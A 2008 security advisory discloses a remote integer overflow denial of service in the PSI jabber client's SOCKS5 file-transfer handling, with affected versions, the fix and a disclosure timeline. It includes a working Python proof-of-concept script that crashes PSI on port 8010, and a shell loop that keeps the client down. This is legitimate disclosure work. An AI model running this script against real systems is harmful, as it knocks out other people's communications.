=============================================
INTERNET SECURITY AUDITORS ALERT 2008-004
PSI remote integer overflow DoS
PSI is a widely used jabber client Qt4 based, available for Windows,
Mac, linux, and other operative systems.
In order doing file transfers, a open port is needed (by default is
8010/tcp)
If first byte of data stream is a 0x05, it means socks5 option and we
enter in the vulnerable zone of the code.
Is possible to satisfy the jump: cmp al, 5 -> je vulnCheck()
The second byte is the amount of bytes to memcpy, but there is a check:
cmp ecx, 10 -> jg goHome()
Well the signed comparison lets us to send negative values, the
acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned)
then the check can be bypased with this int overflow, now we can play
with 0x80 - 0xff range, and the rest of the stream.
By now we pass successfully the QByteArray.Resize() and
QByteArray.Realloc()
And arrive to the memcpy, from all the data stream sended, n bytes
will be copied, n is controlled by us :)
The problem to make a heap overflow, is that the destiny variable will
be resized to n. Then is possible to hangup the process or also the
system with these two ways
#!/usr/bin/python
#by sha0 remote integer overflow DoS (Linux && windows)
#http://jolmos.blogspot.com
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)
try:
sock.send('\x05\xff')
print 'Crashed!'
except:
print 'Cannot send!'
sock.close()
#eof
The process can be crashed remotelly by:
./PSIcoKiller.py <ip>
PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done
Remote/local Denial of Service of the communications.
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem
Tested in Linux and Windows, but may crash other heap implementations.
PSI 0.12.1 solves the problem, nevertheless i suggest filter this port
whenever possible.
Thanks to kev and infinity for their quick response.
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
December 12, 2008: Initial release
December 17, 2008: update the new that 0.12.1 solves the problem.
November 20, 2008: Vulnerability acquired by
Internet Security Auditors
December 02, 2008: Vendor notification
December 12, 2008: Advisory documentation
December 18, 2008: Vendor Release 0.12.1
December 23, 2008: Published
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.